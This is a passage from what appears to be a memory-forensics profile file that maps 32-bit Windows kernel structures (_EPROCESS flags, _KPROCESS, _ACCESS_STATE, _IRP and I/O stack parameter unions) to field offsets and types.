'ExitProcessReported' : [ 0x26c, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'ReportCommitChanges' : [ 0x26c, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'LastReportMemory' : [ 0x26c, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'ReportPhysicalPageChanges' : [ 0x26c, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'HandleTableRundown' : [ 0x26c, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'NeedsHandleRundown' : [ 0x26c, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'RefTraceEnabled' : [ 0x26c, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'NumaAware' : [ 0x26c, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'ProtectedProcess' : [ 0x26c, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'DefaultPagePriority' : [ 0x26c, ['BitField', dict(start_bit = 12, end_bit = 15, native_type='unsigned long')]],
'PrimaryTokenFrozen' : [ 0x26c, ['BitField', dict(start_bit = 15, end_bit = 16, native_type='unsigned long')]],
'ProcessVerifierTarget' : [ 0x26c, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
'StackRandomizationDisabled' : [ 0x26c, ['BitField', dict(start_bit = 17, end_bit = 18, native_type='unsigned long')]],
'AffinityPermanent' : [ 0x26c, ['BitField', dict(start_bit = 18, end_bit = 19, native_type='unsigned long')]],
'AffinityUpdateEnable' : [ 0x26c, ['BitField', dict(start_bit = 19, end_bit = 20, native_type='unsigned long')]],
'PropagateNode' : [ 0x26c, ['BitField', dict(start_bit = 20, end_bit = 21, native_type='unsigned long')]],
'ExplicitAffinity' : [ 0x26c, ['BitField', dict(start_bit = 21, end_bit = 22, native_type='unsigned long')]],
'Flags' : [ 0x270, ['unsigned long']],
'CreateReported' : [ 0x270, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'NoDebugInherit' : [ 0x270, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'ProcessExiting' : [ 0x270, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'ProcessDelete' : [ 0x270, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'Wow64SplitPages' : [ 0x270, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'VmDeleted' : [ 0x270, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'OutswapEnabled' : [ 0x270, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'Outswapped' : [ 0x270, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'ForkFailed' : [ 0x270, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'Wow64VaSpace4Gb' : [ 0x270, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'AddressSpaceInitialized' : [ 0x270, ['BitField', dict(start_bit = 10, end_bit = 12, native_type='unsigned long')]],
'SetTimerResolution' : [ 0x270, ['BitField', dict(start_bit = 12, end_bit = 13, native_type='unsigned long')]],
'BreakOnTermination' : [ 0x270, ['BitField', dict(start_bit = 13, end_bit = 14, native_type='unsigned long')]],
'DeprioritizeViews' : [ 0x270, ['BitField', dict(start_bit = 14, end_bit = 15, native_type='unsigned long')]],
'WriteWatch' : [ 0x270, ['BitField', dict(start_bit = 15, end_bit = 16, native_type='unsigned long')]],
'ProcessInSession' : [ 0x270, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
'OverrideAddressSpace' : [ 0x270, ['BitField', dict(start_bit = 17, end_bit = 18, native_type='unsigned long')]],
'HasAddressSpace' : [ 0x270, ['BitField', dict(start_bit = 18, end_bit = 19, native_type='unsigned long')]],
'LaunchPrefetched' : [ 0x270, ['BitField', dict(start_bit = 19, end_bit = 20, native_type='unsigned long')]],
'InjectInpageErrors' : [ 0x270, ['BitField', dict(start_bit = 20, end_bit = 21, native_type='unsigned long')]],
'VmTopDown' : [ 0x270, ['BitField', dict(start_bit = 21, end_bit = 22, native_type='unsigned long')]],
'ImageNotifyDone' : [ 0x270, ['BitField', dict(start_bit = 22, end_bit = 23, native_type='unsigned long')]],
'PdeUpdateNeeded' : [ 0x270, ['BitField', dict(start_bit = 23, end_bit = 24, native_type='unsigned long')]],
'VdmAllowed' : [ 0x270, ['BitField', dict(start_bit = 24, end_bit = 25, native_type='unsigned long')]],
'CrossSessionCreate' : [ 0x270, ['BitField', dict(start_bit = 25, end_bit = 26, native_type='unsigned long')]],
'ProcessInserted' : [ 0x270, ['BitField', dict(start_bit = 26, end_bit = 27, native_type='unsigned long')]],
'DefaultIoPriority' : [ 0x270, ['BitField', dict(start_bit = 27, end_bit = 30, native_type='unsigned long')]],
'ProcessSelfDelete' : [ 0x270, ['BitField', dict(start_bit = 30, end_bit = 31, native_type='unsigned long')]],
'SetTimerResolutionLink' : [ 0x270, ['BitField', dict(start_bit = 31, end_bit = 32, native_type='unsigned long')]],
'ExitStatus' : [ 0x274, ['long']],
'VadRoot' : [ 0x278, ['_MM_AVL_TABLE']],
'AlpcContext' : [ 0x298, ['_ALPC_PROCESS_CONTEXT']],
'TimerResolutionLink' : [ 0x2a8, ['_LIST_ENTRY']],
'RequestedTimerResolution' : [ 0x2b0, ['unsigned long']],
'ActiveThreadsHighWatermark' : [ 0x2b4, ['unsigned long']],
'SmallestTimerResolution' : [ 0x2b8, ['unsigned long']],
'TimerResolutionStackRecord' : [ 0x2bc, ['pointer', ['_PO_DIAG_STACK_RECORD']]],
} ],
'_KPROCESS' : [ 0x98, {
'Header' : [ 0x0, ['_DISPATCHER_HEADER']],
'ProfileListHead' : [ 0x10, ['_LIST_ENTRY']],
'DirectoryTableBase' : [ 0x18, ['unsigned long']],
'LdtDescriptor' : [ 0x1c, ['_KGDTENTRY']],
'Int21Descriptor' : [ 0x24, ['_KIDTENTRY']],
'ThreadListHead' : [ 0x2c, ['_LIST_ENTRY']],
'ProcessLock' : [ 0x34, ['unsigned long']],
'Affinity' : [ 0x38, ['_KAFFINITY_EX']],
'ReadyListHead' : [ 0x44, ['_LIST_ENTRY']],
'SwapListEntry' : [ 0x4c, ['_SINGLE_LIST_ENTRY']],
'ActiveProcessors' : [ 0x50, ['_KAFFINITY_EX']],
'AutoAlignment' : [ 0x5c, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='long')]],
'DisableBoost' : [ 0x5c, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='long')]],
'DisableQuantum' : [ 0x5c, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='long')]],
'ActiveGroupsMask' : [ 0x5c, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'ReservedFlags' : [ 0x5c, ['BitField', dict(start_bit = 4, end_bit = 32, native_type='long')]],
'ProcessFlags' : [ 0x5c, ['long']],
'BasePriority' : [ 0x60, ['unsigned char']],
'QuantumReset' : [ 0x61, ['unsigned char']],
'Visited' : [ 0x62, ['unsigned char']],
'Unused3' : [ 0x63, ['unsigned char']],
'ThreadSeed' : [ 0x64, ['array', 1, ['unsigned long']]],
'IdealNode' : [ 0x68, ['array', 1, ['unsigned short']]],
'IdealGlobalNode' : [ 0x6a, ['unsigned short']],
'Flags' : [ 0x6c, ['_KEXECUTE_OPTIONS']],
'Unused1' : [ 0x6d, ['unsigned char']],
'IopmOffset' : [ 0x6e, ['unsigned short']],
'Unused4' : [ 0x70, ['unsigned long']],
'StackCount' : [ 0x74, ['_KSTACK_COUNT']],
'ProcessListEntry' : [ 0x78, ['_LIST_ENTRY']],
'CycleTime' : [ 0x80, ['unsigned long long']],
'KernelTime' : [ 0x88, ['unsigned long']],
'UserTime' : [ 0x8c, ['unsigned long']],
'VdmTrapcHandler' : [ 0x90, ['pointer', ['void']]],
} ],
'__unnamed_1291' : [ 0x2c, {
'InitialPrivilegeSet' : [ 0x0, ['_INITIAL_PRIVILEGE_SET']],
'PrivilegeSet' : [ 0x0, ['_PRIVILEGE_SET']],
} ],
'_ACCESS_STATE' : [ 0x74, {
'OperationID' : [ 0x0, ['_LUID']],
'SecurityEvaluated' : [ 0x8, ['unsigned char']],
'GenerateAudit' : [ 0x9, ['unsigned char']],
'GenerateOnClose' : [ 0xa, ['unsigned char']],
'PrivilegesAllocated' : [ 0xb, ['unsigned char']],
'Flags' : [ 0xc, ['unsigned long']],
'RemainingDesiredAccess' : [ 0x10, ['unsigned long']],
'PreviouslyGrantedAccess' : [ 0x14, ['unsigned long']],
'OriginalDesiredAccess' : [ 0x18, ['unsigned long']],
'SubjectSecurityContext' : [ 0x1c, ['_SECURITY_SUBJECT_CONTEXT']],
'SecurityDescriptor' : [ 0x2c, ['pointer', ['void']]],
'AuxData' : [ 0x30, ['pointer', ['void']]],
'Privileges' : [ 0x34, ['__unnamed_1291']],
'AuditPrivileges' : [ 0x60, ['unsigned char']],
'ObjectName' : [ 0x64, ['_UNICODE_STRING']],
'ObjectTypeName' : [ 0x6c, ['_UNICODE_STRING']],
} ],
'_AUX_ACCESS_DATA' : [ 0xc0, {
'PrivilegesUsed' : [ 0x0, ['pointer', ['_PRIVILEGE_SET']]],
'GenericMapping' : [ 0x4, ['_GENERIC_MAPPING']],
'AccessesToAudit' : [ 0x14, ['unsigned long']],
'MaximumAuditMask' : [ 0x18, ['unsigned long']],
'TransactionId' : [ 0x1c, ['_GUID']],
'NewSecurityDescriptor' : [ 0x2c, ['pointer', ['void']]],
'ExistingSecurityDescriptor' : [ 0x30, ['pointer', ['void']]],
'ParentSecurityDescriptor' : [ 0x34, ['pointer', ['void']]],
'DeRefSecurityDescriptor' : [ 0x38, ['pointer', ['void']]],
'SDLock' : [ 0x3c, ['pointer', ['void']]],
'AccessReasons' : [ 0x40, ['_ACCESS_REASONS']],
} ],
'__unnamed_12a0' : [ 0x4, {
'MasterIrp' : [ 0x0, ['pointer', ['_IRP']]],
'IrpCount' : [ 0x0, ['long']],
'SystemBuffer' : [ 0x0, ['pointer', ['void']]],
} ],
'__unnamed_12a5' : [ 0x8, {
'UserApcRoutine' : [ 0x0, ['pointer', ['void']]],
'IssuingProcess' : [ 0x0, ['pointer', ['void']]],
'UserApcContext' : [ 0x4, ['pointer', ['void']]],
} ],
'__unnamed_12a7' : [ 0x8, {
'AsynchronousParameters' : [ 0x0, ['__unnamed_12a5']],
'AllocationSize' : [ 0x0, ['_LARGE_INTEGER']],
} ],
'__unnamed_12b2' : [ 0x28, {
'DeviceQueueEntry' : [ 0x0, ['_KDEVICE_QUEUE_ENTRY']],
'DriverContext' : [ 0x0, ['array', 4, ['pointer', ['void']]]],
'Thread' : [ 0x10, ['pointer', ['_ETHREAD']]],
'AuxiliaryBuffer' : [ 0x14, ['pointer', ['unsigned char']]],
'ListEntry' : [ 0x18, ['_LIST_ENTRY']],
'CurrentStackLocation' : [ 0x20, ['pointer', ['_IO_STACK_LOCATION']]],
'PacketType' : [ 0x20, ['unsigned long']],
'OriginalFileObject' : [ 0x24, ['pointer', ['_FILE_OBJECT']]],
} ],
'__unnamed_12b4' : [ 0x30, {
'Overlay' : [ 0x0, ['__unnamed_12b2']],
'Apc' : [ 0x0, ['_KAPC']],
'CompletionKey' : [ 0x0, ['pointer', ['void']]],
} ],
'_IRP' : [ 0x70, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['unsigned short']],
'MdlAddress' : [ 0x4, ['pointer', ['_MDL']]],
'Flags' : [ 0x8, ['unsigned long']],
'AssociatedIrp' : [ 0xc, ['__unnamed_12a0']],
'ThreadListEntry' : [ 0x10, ['_LIST_ENTRY']],
'IoStatus' : [ 0x18, ['_IO_STATUS_BLOCK']],
'RequestorMode' : [ 0x20, ['unsigned char']],
'PendingReturned' : [ 0x21, ['unsigned char']],
'StackCount' : [ 0x22, ['unsigned char']],
'CurrentLocation' : [ 0x23, ['unsigned char']],
'Cancel' : [ 0x24, ['unsigned char']],
'CancelIrql' : [ 0x25, ['unsigned char']],
'ApcEnvironment' : [ 0x26, ['unsigned char']],
'AllocationFlags' : [ 0x27, ['unsigned char']],
'UserIosb' : [ 0x28, ['pointer', ['_IO_STATUS_BLOCK']]],
'UserEvent' : [ 0x2c, ['pointer', ['_KEVENT']]],
'Overlay' : [ 0x30, ['__unnamed_12a7']],
'CancelRoutine' : [ 0x38, ['pointer', ['void']]],
'UserBuffer' : [ 0x3c, ['pointer', ['void']]],
'Tail' : [ 0x40, ['__unnamed_12b4']],
} ],
'__unnamed_12bb' : [ 0x10, {
'SecurityContext' : [ 0x0, ['pointer', ['_IO_SECURITY_CONTEXT']]],
'Options' : [ 0x4, ['unsigned long']],
'FileAttributes' : [ 0x8, ['unsigned short']],
'ShareAccess' : [ 0xa, ['unsigned short']],
'EaLength' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_12bf' : [ 0x10, {
'SecurityContext' : [ 0x0, ['pointer', ['_IO_SECURITY_CONTEXT']]],
'Options' : [ 0x4, ['unsigned long']],
'Reserved' : [ 0x8, ['unsigned short']],
'ShareAccess' : [ 0xa, ['unsigned short']],
'Parameters' : [ 0xc, ['pointer', ['_NAMED_PIPE_CREATE_PARAMETERS']]],
} ],
'__unnamed_12c3' : [ 0x10, {
'SecurityContext' : [ 0x0, ['pointer', ['_IO_SECURITY_CONTEXT']]],
'Options' : [ 0x4, ['unsigned long']],
'Reserved' : [ 0x8, ['unsigned short']],
'ShareAccess' : [ 0xa, ['unsigned short']],
'Parameters' : [ 0xc, ['pointer', ['_MAILSLOT_CREATE_PARAMETERS']]],
} ],
'__unnamed_12c5' : [ 0x10, {
'Length' : [ 0x0, ['unsigned long']],
'Key' : [ 0x4, ['unsigned long']],
'ByteOffset' : [ 0x8, ['_LARGE_INTEGER']],
} ],
'__unnamed_12c9' : [ 0x10, {
'Length' : [ 0x0, ['unsigned long']],
'FileName' : [ 0x4, ['pointer', ['_UNICODE_STRING']]],
'FileInformationClass' : [ 0x8, ['Enumeration', dict(target = 'long', choices = {1: 'FileDirectoryInformation', 2: 'FileFullDirectoryInformation', 3: 'FileBothDirectoryInformation', 4: 'FileBasicInformation', 5: 'FileStandardInformation', 6: 'FileInternalInformation', 7: 'FileEaInformation', 8: 'FileAccessInformation', 9: 'FileNameInformation', 10: 'FileRenameInformation', 11: 'FileLinkInformation', 12: 'FileNamesInformation', 13: 'FileDispositionInformation', 14: 'FilePositionInformation', 15: 'FileFullEaInformation', 16: 'FileModeInformation', 17: 'FileAlignmentInformation', 18: 'FileAllInformation', 19: 'FileAllocationInformation', 20: 'FileEndOfFileInformation', 21: 'FileAlternateNameInformation', 22: 'FileStreamInformation', 23: 'FilePipeInformation', 24: 'FilePipeLocalInformation', 25: 'FilePipeRemoteInformation', 26: 'FileMailslotQueryInformation', 27: 'FileMailslotSetInformation', 28: 'FileCompressionInformation', 29: 'FileObjectIdInformation', 30: 'FileCompletionInformation', 31: 'FileMoveClusterInformation', 32: 'FileQuotaInformation', 33: 'FileReparsePointInformation', 34: 'FileNetworkOpenInformation', 35: 'FileAttributeTagInformation', 36: 'FileTrackingInformation', 37: 'FileIdBothDirectoryInformation', 38: 'FileIdFullDirectoryInformation', 39: 'FileValidDataLengthInformation', 40: 'FileShortNameInformation', 41: 'FileIoCompletionNotificationInformation', 42: 'FileIoStatusBlockRangeInformation', 43: 'FileIoPriorityHintInformation', 44: 'FileSfioReserveInformation', 45: 'FileSfioVolumeInformation', 46: 'FileHardLinkInformation', 47: 'FileProcessIdsUsingFileInformation', 48: 'FileNormalizedNameInformation', 49: 'FileNetworkPhysicalNameInformation', 50: 'FileIdGlobalTxDirectoryInformation', 51: 'FileIsRemoteDeviceInformation', 52: 'FileAttributeCacheInformation', 53: 'FileNumaNodeInformation', 54: 'FileStandardLinkInformation', 55: 'FileRemoteProtocolInformation', 56: 'FileMaximumInformation'})]],
'FileIndex' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_12cb' : [ 0x8, {
'Length' : [ 0x0, ['unsigned long']],
'CompletionFilter' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_12cd' : [ 0x8, {
'Length' : [ 0x0, ['unsigned long']],
'FileInformationClass' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {1: 'FileDirectoryInformation', 2: 'FileFullDirectoryInformation', 3: 'FileBothDirectoryInformation', 4: 'FileBasicInformation', 5: 'FileStandardInformation', 6: 'FileInternalInformation', 7: 'FileEaInformation', 8: 'FileAccessInformation', 9: 'FileNameInformation', 10: 'FileRenameInformation', 11: 'FileLinkInformation', 12: 'FileNamesInformation', 13: 'FileDispositionInformation', 14: 'FilePositionInformation', 15: 'FileFullEaInformation', 16: 'FileModeInformation', 17: 'FileAlignmentInformation', 18: 'FileAllInformation', 19: 'FileAllocationInformation', 20: 'FileEndOfFileInformation', 21: 'FileAlternateNameInformation', 22: 'FileStreamInformation', 23: 'FilePipeInformation', 24: 'FilePipeLocalInformation', 25: 'FilePipeRemoteInformation', 26: 'FileMailslotQueryInformation', 27: 'FileMailslotSetInformation', 28: 'FileCompressionInformation', 29: 'FileObjectIdInformation', 30: 'FileCompletionInformation', 31: 'FileMoveClusterInformation', 32: 'FileQuotaInformation', 33: 'FileReparsePointInformation', 34: 'FileNetworkOpenInformation', 35: 'FileAttributeTagInformation', 36: 'FileTrackingInformation', 37: 'FileIdBothDirectoryInformation', 38: 'FileIdFullDirectoryInformation', 39: 'FileValidDataLengthInformation', 40: 'FileShortNameInformation', 41: 'FileIoCompletionNotificationInformation', 42: 'FileIoStatusBlockRangeInformation', 43: 'FileIoPriorityHintInformation', 44: 'FileSfioReserveInformation', 45: 'FileSfioVolumeInformation', 46: 'FileHardLinkInformation', 47: 'FileProcessIdsUsingFileInformation', 48: 'FileNormalizedNameInformation', 49: 'FileNetworkPhysicalNameInformation', 50: 'FileIdGlobalTxDirectoryInformation', 51: 'FileIsRemoteDeviceInformation', 52: 'FileAttributeCacheInformation', 53: 'FileNumaNodeInformation', 54: 'FileStandardLinkInformation', 55: 'FileRemoteProtocolInformation', 56: 'FileMaximumInformation'})]],
} ],
'__unnamed_12cf' : [ 0x10, {
'Length' : [ 0x0, ['unsigned long']],
'FileInformationClass' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {1: 'FileDirectoryInformation', 2: 'FileFullDirectoryInformation', 3: 'FileBothDirectoryInformation', 4: 'FileBasicInformation', 5: 'FileStandardInformation', 6: 'FileInternalInformation', 7: 'FileEaInformation', 8: 'FileAccessInformation', 9: 'FileNameInformation', 10: 'FileRenameInformation', 11: 'FileLinkInformation', 12: 'FileNamesInformation', 13: 'FileDispositionInformation', 14: 'FilePositionInformation', 15: 'FileFullEaInformation', 16: 'FileModeInformation', 17: 'FileAlignmentInformation', 18: 'FileAllInformation', 19: 'FileAllocationInformation', 20: 'FileEndOfFileInformation', 21: 'FileAlternateNameInformation', 22: 'FileStreamInformation', 23: 'FilePipeInformation', 24: 'FilePipeLocalInformation', 25: 'FilePipeRemoteInformation', 26: 'FileMailslotQueryInformation', 27: 'FileMailslotSetInformation', 28: 'FileCompressionInformation', 29: 'FileObjectIdInformation', 30: 'FileCompletionInformation', 31: 'FileMoveClusterInformation', 32: 'FileQuotaInformation', 33: 'FileReparsePointInformation', 34: 'FileNetworkOpenInformation', 35: 'FileAttributeTagInformation', 36: 'FileTrackingInformation', 37: 'FileIdBothDirectoryInformation', 38: 'FileIdFullDirectoryInformation', 39: 'FileValidDataLengthInformation', 40: 'FileShortNameInformation', 41: 'FileIoCompletionNotificationInformation', 42: 'FileIoStatusBlockRangeInformation', 43: 'FileIoPriorityHintInformation', 44: 'FileSfioReserveInformation', 45: 'FileSfioVolumeInformation', 46: 'FileHardLinkInformation', 47: 'FileProcessIdsUsingFileInformation', 48: 'FileNormalizedNameInformation', 49: 'FileNetworkPhysicalNameInformation', 50: 'FileIdGlobalTxDirectoryInformation', 51: 'FileIsRemoteDeviceInformation', 52: 'FileAttributeCacheInformation', 53: 'FileNumaNodeInformation', 54: 'FileStandardLinkInformation', 55: 'FileRemoteProtocolInformation', 56: 'FileMaximumInformation'})]],
'FileObject' : [ 0x8, ['pointer', ['_FILE_OBJECT']]],
'ReplaceIfExists' : [ 0xc, ['unsigned char']],
'AdvanceOnly' : [ 0xd, ['unsigned char']],
'ClusterCount' : [ 0xc, ['unsigned long']],
'DeleteHandle' : [ 0xc, ['pointer', ['void']]],
} ],
'__unnamed_12d1' : [ 0x10, {
'Length' : [ 0x0, ['unsigned long']],
'EaList' : [ 0x4, ['pointer', ['void']]],
'EaListLength' : [ 0x8, ['unsigned long']],
'EaIndex' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_12d3' : [ 0x4, {
'Length' : [ 0x0, ['unsigned long']],
} ],
'__unnamed_12d7' : [ 0x8, {
'Length' : [ 0x0, ['unsigned long']],
'FsInformationClass' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {1: 'FileFsVolumeInformation', 2: 'FileFsLabelInformation', 3: 'FileFsSizeInformation', 4: 'FileFsDeviceInformation', 5: 'FileFsAttributeInformation', 6: 'FileFsControlInformation', 7: 'FileFsFullSizeInformation', 8: 'FileFsObjectIdInformation', 9: 'FileFsDriverPathInformation', 10: 'FileFsVolumeFlagsInformation', 11: 'FileFsMaximumInformation'})]],
} ],
'__unnamed_12d9' : [ 0x10, {
'OutputBufferLength' : [ 0x0, ['unsigned long']],
'InputBufferLength' : [ 0x4, ['unsigned long']],
'FsControlCode' : [ 0x8, ['unsigned long']],
'Type3InputBuffer' : [ 0xc, ['pointer', ['void']]],
} ],
'__unnamed_12dc' : [ 0x10, {
'Length' : [ 0x0, ['pointer', ['_LARGE_INTEGER']]],
'Key' : [ 0x4, ['unsigned long']],
'ByteOffset' : [ 0x8, ['_LARGE_INTEGER']],
} ],
'__unnamed_12de' : [ 0x10, {
'OutputBufferLength' : [ 0x0, ['unsigned long']],
'InputBufferLength' : [ 0x4, ['unsigned long']],
'IoControlCode' : [ 0x8, ['unsigned long']],
'Type3InputBuffer' : [ 0xc, ['pointer', ['void']]],
} ],
'__unnamed_12e0' : [ 0x8, {
'SecurityInformation' : [ 0x0, ['unsigned long']],
'Length' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_12e2' : [ 0x8, {
'SecurityInformation' : [ 0x0, ['unsigned long']],
'SecurityDescriptor' : [ 0x4, ['pointer', ['void']]],
} ],
'__unnamed_12e6' : [ 0x8, {
'Vpb' : [ 0x0, ['pointer', ['_VPB']]],
'DeviceObject' : [ 0x4, ['pointer', ['_DEVICE_OBJECT']]],
} ],
'__unnamed_12ea' : [ 0x4, {
'Srb' : [ 0x0, ['pointer', ['_SCSI_REQUEST_BLOCK']]],
} ],
'__unnamed_12ee' : [ 0x10, {
'Length' : [ 0x0, ['unsigned long']],
'StartSid' : [ 0x4, ['pointer', ['void']]],
'SidList' : [ 0x8, ['pointer', ['_FILE_GET_QUOTA_INFORMATION']]],
'SidListLength' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_12f2' : [ 0x4, {
'Type' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'BusRelations', 1: 'EjectionRelations', 2: 'PowerRelations', 3: 'RemovalRelations', 4: 'TargetDeviceRelation', 5: 'SingleBusRelations', 6: 'TransportRelations'})]],
} ],
'__unnamed_12f8' : [ 0x10, {
'InterfaceType' : [ 0x0, ['pointer', ['_GUID']]],
'Size' : [ 0x4, ['unsigned short']],
'Version' : [ 0x6, ['unsigned short']],
'Interface' : [ 0x8, ['pointer', ['_INTERFACE']]],
'InterfaceSpecificData' : [ 0xc, ['pointer', ['void']]],
} ],
'__unnamed_12fc' : [ 0x4, {
'Capabilities' : [ 0x0, ['pointer', ['_DEVICE_CAPABILITIES']]],
} ],
'__unnamed_1300' : [ 0x4, {
'IoResourceRequirementList' : [ 0x0, ['pointer', ['_IO_RESOURCE_REQUIREMENTS_LIST']]],
} ],
'__unnamed_1302' : [ 0x10, {
'WhichSpace' : [ 0x0, ['unsigned long']],
'Buffer' : [ 0x4, ['pointer', ['void']]],
'Offset' : [ 0x8, ['unsigned long']],
'Length' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_1304' : [ 0x1, {
'Lock' : [ 0x0, ['unsigned char']],
} ],
'__unnamed_1308' : [ 0x4, {
'IdType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'BusQueryDeviceID', 1: 'BusQueryHardwareIDs', 2: 'BusQueryCompatibleIDs', 3: 'BusQueryInstanceID', 4: 'BusQueryDeviceSerialNumber', 5: 'BusQueryContainerID'})]],
} ],
'__unnamed_130c' : [ 0x8, {
'DeviceTextType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'DeviceTextDescription', 1: 'DeviceTextLocationInformation'})]],
'LocaleId' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_1310' : [ 0x8, {
'InPath' : [ 0x0, ['unsigned char']],
'Reserved' : [ 0x1, ['array', 3, ['unsigned char']]],
'Type' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'DeviceUsageTypeUndefined', 1: 'DeviceUsageTypePaging', 2: 'DeviceUsageTypeHibernation', 3: 'DeviceUsageTypeDumpFile'})]],
} ],
'__unnamed_1314' : [ 0x4, {
'PowerState' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
} ],
'__unnamed_1318' : [ 0x4, {
'PowerSequence' : [ 0x0, ['pointer', ['_POWER_SEQUENCE']]],
} ],
'__unnamed_1320' : [ 0x10, {
'SystemContext' : [ 0x0, ['unsigned long']],
'SystemPowerStateContext' : [ 0x0, ['_SYSTEM_POWER_STATE_CONTEXT']],
'Type' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'SystemPowerState', 1: 'DevicePowerState'})]],
'State' : [ 0x8, ['_POWER_STATE']],
'ShutdownType' : [ 0xc, ['Enumeration', dict(target = 'long', choices = {0: 'PowerActionNone', 1: 'PowerActionReserved', 2: 'PowerActionSleep', 3: 'PowerActionHibernate', 4: 'PowerActionShutdown', 5: 'PowerActionShutdownReset', 6: 'PowerActionShutdownOff', 7: 'PowerActionWarmEject'})]],
} ],
'__unnamed_1324' : [ 0x8, {
'AllocatedResources' : [ 0x0, ['pointer', ['_CM_RESOURCE_LIST']]],
'AllocatedResourcesTranslated' : [ 0x4, ['pointer', ['_CM_RESOURCE_LIST']]],
} ],
'__unnamed_1326' : [ 0x10, {
'ProviderId' : [ 0x0, ['unsigned long']],
'DataPath' : [ 0x4, ['pointer', ['void']]],
'BufferSize' : [ 0x8, ['unsigned long']],
'Buffer' : [ 0xc, ['pointer', ['void']]],
} ],
'__unnamed_1328' : [ 0x10, {
'Argument1' : [ 0x0, ['pointer', ['void']]],
'Argument2' : [ 0x4, ['pointer', ['void']]],
'Argument3' : [ 0x8, ['pointer', ['void']]],
'Argument4' : [ 0xc, ['pointer', ['void']]],
} ],
'__unnamed_132a' : [ 0x10, {
'Create' : [ 0x0, ['__unnamed_12bb']],
'CreatePipe' : [ 0x0, ['__unnamed_12bf']],
'CreateMailslot' : [ 0x0, ['__unnamed_12c3']],
'Read' : [ 0x0, ['__unnamed_12c5']],
'Write' : [ 0x0, ['__unnamed_12c5']],
'QueryDirectory' : [ 0x0, ['__unnamed_12c9']],
'NotifyDirectory' : [ 0x0, ['__unnamed_12cb']],
'QueryFile' : [ 0x0, ['__unnamed_12cd']],
'SetFile' : [ 0x0, ['__unnamed_12cf']],
'QueryEa' : [ 0x0, ['__unnamed_12d1']],
'SetEa' : [ 0x0, ['__unnamed_12d3']],
'QueryVolume' : [ 0x0, ['__unnamed_12d7']],
'SetVolume' : [ 0x0, ['__unnamed_12d7']],
'FileSystemControl' : [ 0x0, ['__unnamed_12d9']],
'LockControl' : [ 0x0, ['__unnamed_12dc']],
'DeviceIoControl' : [ 0x0, ['__unnamed_12de']],
'QuerySecurity' : [ 0x0, ['__unnamed_12e0']],
'SetSecurity' : [ 0x0, ['__unnamed_12e2']],
'MountVolume' : [ 0x0, ['__unnamed_12e6']],
'VerifyVolume' : [ 0x0, ['__unnamed_12e6']],
'Scsi' : [ 0x0, ['__unnamed_12ea']],
'QueryQuota' : [ 0x0, ['__unnamed_12ee']],
'SetQuota' : [ 0x0, ['__unnamed_12d3']],
'QueryDeviceRelations' : [ 0x0, ['__unnamed_12f2']],
'QueryInterface' : [ 0x0, ['__unnamed_12f8']],
'DeviceCapabilities' : [ 0x0, ['__unnamed_12fc']],
'FilterResourceRequirements' : [ 0x0, ['__unnamed_1300']],
'ReadWriteConfig' : [ 0x0, ['__unnamed_1302']],
'SetLock' : [ 0x0, ['__unnamed_1304']],
'QueryId' : [ 0x0, ['__unnamed_1308']],
'QueryDeviceText' : [ 0x0, ['__unnamed_130c']],
'UsageNotification' : [ 0x0, ['__unnamed_1310']],
'WaitWake' : [ 0x0, ['__unnamed_1314']],
'PowerSequence' : [ 0x0, ['__unnamed_1318']],
'Power' : [ 0x0, ['__unnamed_1320']],
'StartDevice' : [ 0x0, ['__unnamed_1324']],
'WMI' : [ 0x0, ['__unnamed_1326']],
'Others' : [ 0x0, ['__unnamed_1328']],
} ],
'_IO_STACK_LOCATION' : [ 0x24, {
'MajorFunction' : [ 0x0, ['unsigned char']],
